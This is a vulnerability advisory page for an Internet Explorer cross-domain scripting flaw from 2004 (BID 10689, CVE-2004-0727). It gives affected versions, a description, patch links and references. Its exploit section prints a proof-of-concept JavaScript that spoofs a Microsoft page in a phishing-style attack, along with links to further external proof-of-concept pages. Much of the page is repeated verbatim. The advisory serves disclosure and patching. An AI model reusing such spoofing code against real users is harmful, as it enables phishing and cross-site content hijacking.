Microsoft Internet Explorer JavaScript Method Assignment Cross-Domain Scripting Vulnerability
BID:10689
Info
Microsoft Internet Explorer JavaScript Method Assignment Cross-Domain Scripting Vulnerability
| Bugtraq ID: | 10689 |
| Class: | Origin Validation Error |
| CVE: |
CVE-2004-0727 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 12 2004 12:00AM |
| Updated: | Jul 12 2009 06:16AM |
| Credit: | Discovery is credited to Paul <[email protected]>. |
| Vulnerable: |
Microsoft Internet Explorer 5.0.1 SP4 Microsoft Internet Explorer 5.0.1 SP3 Microsoft Internet Explorer 5.0.1 SP2 Microsoft Internet Explorer 5.0.1 SP1 Microsoft Internet Explorer 5.0.1 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.5 SP2 Microsoft Internet Explorer 5.5 SP1 Microsoft Internet Explorer 5.5 Avaya S8100 Media Servers 0 Avaya S3400 Message Application Server 0 Avaya Modular Messaging (MSS) 2.0 Avaya Modular Messaging (MSS) 1.1 Avaya IP600 Media Servers Avaya DefinityOne Media Servers |
| Not Vulnerable: |
Microsoft Internet Explorer 6.0 SP2 - do not use |
Discussion
Microsoft Internet Explorer JavaScript Method Assignment Cross-Domain Scripting Vulnerability
A vulnerability exists in Microsoft Internet Explorer that may allow cross-domain/cross-zone scripting.
It is reported that the vulnerability presents itself due to a failure to properly validate trust relationships between method calls that are made in separate Internet Explorer windows. This may make it possible for script code to access properties of a foreign domain or Security Zone.
Exploitation may permit execution of arbitrary code as the victim user.
A vulnerability exists in Microsoft Internet Explorer that may allow cross-domain/cross-zone scripting.
It is reported that the vulnerability presents itself due to a failure to properly validate trust relationships between method calls that are made in separate Internet Explorer windows. This may make it possible for script code to access properties of a foreign domain or Security Zone.
Exploitation may permit execution of arbitrary code as the victim user.
Exploit / POC
Microsoft Internet Explorer JavaScript Method Assignment Cross-Domain Scripting Vulnerability
http-equiv, has provided the following exploit that leverages this vulnerability to perform a phishing style attack:
<script>
//courtesy of Paul
function govuln(){
var w=window.open("javascript:setInterval(function(){try{var tempvar=opener.location.href;}catch(e){location.assign('javascript:document.innerHTML=&quot;<title>Microsoft Corporation</title>0wned&quot;');window.close();}},100)","_blank","height=10,width=10,left=10000,top=10000");
w.location.assign=location.assign;
location.href="http://www.microsoft.com";
}
govuln()
</script>
The following example was provided:
<script>;
var var1=location.assign;
alert("Assign function of the current window:\n"+var1);
var w=window.open("about:blank","_blank");
var var2=w.location.assign;
var w=alert("Assign function of the new window:\n"+var2);
w.close();
</script>;
This will reportedly generate two alerts describing the assign().
A further working proof-of-concept is available at the following page:
http://freehost07.websamba.com/greyhats/similarmethodnameredir.htm
An additional proof-of-concept that demonstrates this issue is available at the following page:
http://freehost07.websamba.com/greyhats/evilchild.htm
http-equiv, has provided the following exploit that leverages this vulnerability to perform a phishing style attack:
<script>
//courtesy of Paul
function govuln(){
var w=window.open("javascript:setInterval(function(){try{var tempvar=opener.location.href;}catch(e){location.assign('javascript:document.innerHTML=&quot;<title>Microsoft Corporation</title>0wned&quot;');window.close();}},100)","_blank","height=10,width=10,left=10000,top=10000");
w.location.assign=location.assign;
location.href="http://www.microsoft.com";
}
govuln()
</script>
The following example was provided:
<script>;
var var1=location.assign;
alert("Assign function of the current window:\n"+var1);
var w=window.open("about:blank","_blank");
var var2=w.location.assign;
var w=alert("Assign function of the new window:\n"+var2);
w.close();
</script>;
This will reportedly generate two alerts describing the assign().
A further working proof-of-concept is available at the following page:
http://freehost07.websamba.com/greyhats/similarmethodnameredir.htm
An additional proof-of-concept that demonstrates this issue is available at the following page:
http://freehost07.websamba.com/greyhats/evilchild.htm
Solution / Fix
Microsoft Internet Explorer JavaScript Method Assignment Cross-Domain Scripting Vulnerability
Solution:
Microsoft has released a cumulative update for supported versions of Internet Explorer to address this and other vulnerabilities.
Avaya has released an advisory that acknowledges this vulnerability for Avaya products. Customers are advised to follow Microsoft.s guidance for applying patches. Please see the referenced Avaya advisory at the following location for further details:
http://support.avaya.com/japple/css/japple?temp.groupID=128450&temp.selectedFamily=128451&temp.selectedProduct=154235&temp.selectedBucket=126655&temp.feedbackState=askForFeedback&temp.documentID=203487&PAGE=avaya.css.CSSLvl1Detail&executeTransaction=avaya.css.UsageUpdate()
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.5 SP2
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP4
Solution:
Microsoft has released a cumulative update for supported versions of Internet Explorer to address this and other vulnerabilities.
Avaya has released an advisory that acknowledges this vulnerability for Avaya products. Customers are advised to follow Microsoft.s guidance for applying patches. Please see the referenced Avaya advisory at the following location for further details:
http://support.avaya.com/japple/css/japple?temp.groupID=128450&temp.selectedFamily=128451&temp.selectedProduct=154235&temp.selectedBucket=126655&temp.feedbackState=askForFeedback&temp.documentID=203487&PAGE=avaya.css.CSSLvl1Detail&executeTransaction=avaya.css.UsageUpdate()
Microsoft Internet Explorer 6.0 SP1
-
Microsoft Cumulative Security Update for Internet Explorer 6 Service Pack 1 for Windows 98, Windows NT and Wi
For Microsoft Windows 98, Windows 98 Second Edition, Windows ME, and Windows NT4 Server.
http://www.microsoft.com/downloads/details.aspx?FamilyId=DE8D94C4-7F58 -4CE7-B8BD-51CFD795B03E&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 6 Service Pack 1 for Windows XP and Windows 2000 (
For Microsoft Windows 2000 Service Pack 3, Windows 2000 Service Pack 4, Windows XP, and Windows XP Service Pack 1.
http://www.microsoft.com/downloads/details.aspx?FamilyId=7C1404E6-F5D4 -4FED-9573-DD83F2DFF074&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 6 SP1 64-bit Edition (KB834707)
For Microsoft Windows XP SP1 64-bit.
http://www.microsoft.com/downloads/details.aspx?FamilyId=C05103E8-4402 -4D54-BA03-FBBC24142E4D&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 (KB834707)
For Microsoft Windows Server 2003 Family.
http://www.microsoft.com/downloads/details.aspx?FamilyId=19E69E5F-9C98 -49AD-A61F-4F82A4014412&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 64-bit Edition (KB834707)
For Microsoft Windows Server 2003 Family (64-bit).
http://www.microsoft.com/downloads/details.aspx?FamilyId=566C2A05-2513 -4E30-A3EA-87D4BF7F9730&displaylang=en
Microsoft Internet Explorer 5.5 SP2
-
Microsoft Cumulative Security Update for Internet Explorer 5.5 Service Pack 2 (KB834707) - English
For Microsft Windows Millennium Edition.
http://www.microsoft.com/downloads/details.aspx?FamilyId=BE27F77C-3C2D -45F1-86DF-2B71799DA169&displaylang=en
Microsoft Internet Explorer 6.0
-
Microsoft Cumulative Security Update for Internet Explorer 6 (KB834707)
For Windows XP.
http://www.microsoft.com/downloads/details.aspx?FamilyId=A89CFBE8-C299 -415D-A9D6-7CC6429C547D&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 (KB834707)
For Microsoft Windows Server 2003 Family.
http://www.microsoft.com/downloads/details.aspx?FamilyId=19E69E5F-9C98 -49AD-A61F-4F82A4014412&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 64-bit Edition (KB834707)
For Microsoft Windows Server 2003 Family (64-bit).
http://www.microsoft.com/downloads/details.aspx?FamilyId=566C2A05-2513 -4E30-A3EA-87D4BF7F9730&displaylang=en
Microsoft Internet Explorer 5.0.1 SP3
-
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 3 (KB834707)
For Windows 2000 Service Pack 3.
http://www.microsoft.com/downloads/details.aspx?FamilyId=2D8E8E97-4946 -4994-924B-1FB1DC1881BA&displaylang=en
Microsoft Internet Explorer 5.0.1 SP4
-
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 4 (KB834707)
For Windows 2000 Service Pack 4.
http://www.microsoft.com/downloads/details.aspx?FamilyId=72DBE239-AF0A -42B5-B88C-A00371F6EC81&displaylang=en
References
Microsoft Internet Explorer JavaScript Method Assignment Cross-Domain Scripting Vulnerability
References:
References:
- GreyHats Security Group Homepage (GreyHats Security Group)
- Microsoft Security Bulletin MS04-038 (Microsoft)
- MSIE Overly Trusted Location Variant Method Cache Vulnerability (Paul
) - MSIE Similar Method Name Redirection Cross Site/Zone Scripting Vulnerability (Paul
) - Re: MSIE Similar Method Name Redirection Cross Site/Zone Scripting Vulnerabilit ("[email protected]" <[email protected]>)
- RE: MSIE Similar Method Name Redirection Cross Site/Zone Scripting Vulnerabil ("Thor Larholm"
)